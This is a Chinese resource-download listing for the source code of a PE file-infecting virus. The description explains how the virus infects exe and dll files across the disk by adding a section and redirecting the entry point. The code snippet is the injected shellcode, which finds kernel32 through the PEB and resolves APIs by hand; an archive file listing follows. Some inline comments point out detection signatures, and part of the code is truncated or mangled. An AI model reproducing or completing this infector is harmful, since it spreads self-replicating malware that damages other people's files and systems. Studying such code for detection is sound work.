資源簡介
眾所周知,感染型病毒是通過感染計算機PE文件,來復制傳播。病毒與PE文件同穿一條褲子,偷偷寄存在人家后院,盡干“不見得人”的事。
搜一下硬盤發現曾寫過一個練過手,雖然寫得不盡完美,但感染性還是有的,分享下,初學者能有一個直觀印象,大鳥請拍磚。
病毒的目的是創建svchost傀儡進程,感染計算機下所有非系統文件夾下的exe、dll文件,在被感染文件中添加一個節,把母體和shellcode寫進去,並修改入口點指向該節。下次被感染文件運行時,shellcode釋放病毒母體並運行,重復上述過程繼續感染。(注意:這是可實際感染文件的病毒源碡,只應在斷網的隔離虛擬機中編譯、運行和分析;被改寫的入口點、新增的節以及運行時釋放的母體文件,都是可用於檢測的特徵。)

代碼片段和文件信息
/* ************************************
 *
 * 功能: 添加到PE文件的執行代碼 (the code that is appended to the PE file and executed)
 *
 **************************************/
#include?
#include?
#include?“DataStruct.h“
#pragma?comment(linker“/merge:.data=.text“)
#pragma?comment(linker?“/SECTION:.textREW“)
/*
 * State shared between the injected code and the infector that patches it.
 * Because the linker pragmas above merge .data into .text and mark that
 * section RWE, these variables live inside the very bytes that are copied
 * into the victim PE, so their order and size are part of the shellcode's
 * layout -- do not reorder or resize them.
 */
DWORD Matrix_size=0x600;            // size of the parent body ("matrix") in bytes -- presumably what gets dropped later; confirm against the injector
DWORD Matrix_start=0x401320;        // assumed address of the parent body before relocation
DWORD OrigEntyPoint=0xF1F1F1F2;     // original EntryPoint of the host; 0xF1F1F1F2 is a marker value, presumably patched by the infector at infection time
DWORD g_kernel32=0xF1F1F1F3;        // base of kernel32.dll; the marker value is overwritten at runtime by getKernel32()
/* API names kept as plain strings: the code resolves them by walking the
 * export table itself instead of going through the host's import table. */
char szKernel32[]="Kernel32.dll";
char szOpenMutexA[]="OpenMutexA";
char szReleaseMutex[]="ReleaseMutex";
char szCreateFileA[]="CreateFileA";
char szWriteFile[]="WriteFile";
char szCloseHandle[]="CloseHandle";
char szCreateProcessA[]="CreateProcessA";
char szMutexName[]="MY_SYSTEM_DEMETRA_MAIN";   // appears to be the name of the mutex the code opens -- a fixed name like this is a usable host-based indicator
char szGetModuleFileNameA[]="GetModuleFileNameA";
char szLoad[13]="LoadLibraryA";     // 12 chars + NUL: sized exactly, no slack
char szGetpro[15]="GetProcAddress"; // 14 chars + NUL: sized exactly, no slack
char szCurrentModuleName[MAX_PATH]="ABCDEFGHIJKLMNOP"; // scratch buffer; the filler text is presumably overwritten with the running module's path (GetModuleFileNameA is resolved above) -- confirm in ShellCode()
/*
 * getKernel32 -- locate the in-memory base of kernel32.dll without using
 * any imports, by walking the process's PEB loader data, and store the
 * result in g_kernel32 (ShellCode() then parses that base as a PE image
 * to find its export table).
 *
 * Declared naked: the compiler emits no prologue or epilogue, so the body
 * is exactly the instructions below plus the final `ret`.
 *
 * Side effects: clobbers eax and esi. esi is NOT restored, although the
 * calling C code may treat it as callee-saved.
 *
 * NOTE(review): the offsets are undocumented x86 PEB / PEB_LDR_DATA /
 * LDR_DATA_TABLE_ENTRY layout constants, and the walk assumes kernel32 is
 * found at a fixed position in the initialization-order module list, which
 * is Windows-version dependent. For a defender, the sequence
 * fs:[0x30] -> [+0x0c] -> [+0x1c] -> lods -> [+0x08] is the classic
 * "find kernel32 via PEB" shellcode idiom and a good detection signature.
 */
__declspec(naked)
void
getKernel32(){
__asm{
mov eax, fs:[0x30]         ; eax = PEB (fs:[0x30] is the TEB's ProcessEnvironmentBlock slot)
mov eax, [eax+0xc]         ; eax = PEB->Ldr
mov esi, [eax+0x1c]        ; esi = &Ldr->InInitializationOrderModuleList.Flink
lods dword ptr ds:[esi]    ; eax = *esi (first entry's Flink, i.e. the second entry); esi += 4
mov eax, [eax+0x8]         ; eax = that entry's DllBase (assumed to be kernel32)
mov g_kernel32, eax        ; publish the base for ShellCode() to consume
ret
}
}
/* ************************************
 *
 * ShellCode需要重定位,不宜有太多分支。簡單容易提取
 * (the shellcode is position-dependent and must be relocated, so it avoids branching; keep it simple so it is easy to extract)
 *
 **************************************/
void?ShellCode(){
_OPENMUTEX?MyOpenMutex;
_RELEASEMUTEX?MyReleaseMutex;
_CREATEFILE?MyCreateFile;
_WRITEFILE?MyWriteFile;
_CREATEPROCESS?MyCreateProcess;
_CLOSEHANDLE?MyCloseHandle;
_GETMODULEFILENAME?MyGetModuleFileName;
_LOADLIBRARYA?MyLoadLibraryA=NULL;
_GETPROCADDRESS?MyGetProcAddress=NULL;
HMODULE?hKernel32;
PIMAGE_EXPORT_DIRECTORY?pImage_export_directory;
DWORD?PE_RVA;
int?NumberOfFunctions=0;
DWORD?AddressOfNames;
getKernel32();
PE_RVA=*((DWORD*)(g_kernel32+0x3c));
pImage_export_directory=(PIMAGE_EXPORT_DIRECTORY)((*((DWORD*)(g_kernel32+PE_RVA+0x78)))+g_kernel32);//得到輸出表VA
NumberOfFunctions=pImage_export_directory->NumberOfFunctions;//導出個數
AddressOfNames=pImage_export_directory->AddressOfNames+g_kernel32;//名字地址VA
/*得到LoadLibraryA和GetProcAddress的地址*/
for?(int?i=0;i {
char*?szFunName=(char*)(*((DWORD*)(AddressOfNames+i*4))+g_kernel32);//指向導出函數名字地址
char*?szSrcString=szLoad;?
for(;*szSrcString==*szFunName?&&?*szSrcString!=0;++szSrcString++szFunName);
if?(!(*szFunName-*szSrcString))//是否相等
{
MyLoadLibraryA=(_LOADLIBRARYA)(*(((DWORD*)(pImage_export_directory->AddressOfFunctions+g_kernel32))+i)+g_kernel32);//得到地址
}
szFunName=(char*)(*((DWORD*)(AddressOfNames+i*4))+g_kernel32);//指向導出函數名字地址
szSrcString=szGetpro;?
for(;*szSrcString==*szFunName?&&?*szSrcString!=0;++szSrcString++szFunName);
if?(!(*szFunName-*szSrcString))//是否相等
{
MyGetProcAddress=(_GETPROCADDRESS)(*(((DWORD*)(pImage_export_directory->AddressOfFunctions+g_kernel32))+i)+g_kernel32);//得到地址
}
}
hKernel32=MyLoadLibraryA(szKernel32);
MyOpenMutex=(_OPENMUTEX)MyGetProcAddress(hKernel32szOpenMutexA);
MyReleaseMutex=(_RELEASEMUTEX)MyGetProcAddress(hKernel32szReleas
?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2014-03-21?00:09??完成v1.2\
?????目錄???????????0??2014-03-21?00:09??完成v1.2\bin\
?????文件???????45056??2013-05-11?22:16??完成v1.2\bin\完成v1.2.v
?????目錄???????????0??2014-03-20?22:39??完成v1.2\源碼v1.2\
?????目錄???????????0??2014-03-13?11:23??完成v1.2\源碼v1.2\ShellcodeTest\
?????文件????????2216??2013-05-03?15:06??完成v1.2\源碼v1.2\ShellcodeTest\DataStruct.h
?????文件????????4734??2013-05-11?21:58??完成v1.2\源碼v1.2\ShellcodeTest\ShellCodeTest.cpp
?????文件????????4050??2013-05-03?20:42??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTest.vcxproj
?????文件????????1074??2013-05-02?20:14??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTest.vcxproj.filters
?????文件?????????143??2013-05-02?17:31??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTest.vcxproj.user
?????文件????????1536??2013-05-05?23:16??完成v1.2\源碼v1.2\ShellcodeTest\ShellcodeTestSrv.exe
?????文件????????1856??2013-05-11?22:09??完成v1.2\源碼v1.2\Test.sln
?????文件???????46080??2013-10-28?09:15??完成v1.2\源碼v1.2\Test.suo
?????目錄???????????0??2014-03-13?11:23??完成v1.2\源碼v1.2\注入代碼\
?????文件????????5690??2013-05-10?17:43??完成v1.2\源碼v1.2\注入代碼\DataStruct.h
?????文件???????27857??2013-10-25?11:52??完成v1.2\源碼v1.2\注入代碼\Inject.cpp
?????文件????????1056??2013-05-05?18:23??完成v1.2\源碼v1.2\注入代碼\Shellcod_00401000.mem
?????文件???????17824??2013-05-04?16:29??完成v1.2\源碼v1.2\注入代碼\注入代碼.aps
?????文件????????4140??2013-05-11?18:17??完成v1.2\源碼v1.2\注入代碼\注入代碼.vcxproj
?????文件????????1067??2013-05-05?18:38??完成v1.2\源碼v1.2\注入代碼\注入代碼.vcxproj.filters
?????文件?????????143??2013-04-28?09:52??完成v1.2\源碼v1.2\注入代碼\注入代碼.vcxproj.user
?????文件???????34576??2013-05-04?16:29??完成v1.2\源碼v1.2\注入代碼\注入代碼1.aps
?????目錄???????????0??2014-03-13?11:23??完成v1.2\源碼v1.2\測試目標\
?????文件?????????208??2013-05-07?15:30??完成v1.2\源碼v1.2\測試目標\DataStruct.h
?????文件?????????674??2013-05-07?17:07??完成v1.2\源碼v1.2\測試目標\ImportFuncStruct.h
?????文件????????1735??2013-05-08?17:45??完成v1.2\源碼v1.2\測試目標\MyFunction.h
?????文件?????????896??2013-05-07?14:21??完成v1.2\源碼v1.2\測試目標\resource.h
?????文件????????8474??2013-05-11?22:05??完成v1.2\源碼v1.2\測試目標\Target.cpp
?????文件????????6464??2013-05-07?20:43??完成v1.2\源碼v1.2\測試目標\合成第四版(第四個版備份).mem
?????文件????????8288??2013-05-11?20:45??完成v1.2\源碼v1.2\測試目標\合成第四版.mem
?????文件???????40224??2013-05-07?14:21??完成v1.2\源碼v1.2\測試目標\測試目標.aps
............此處省略5個文件信息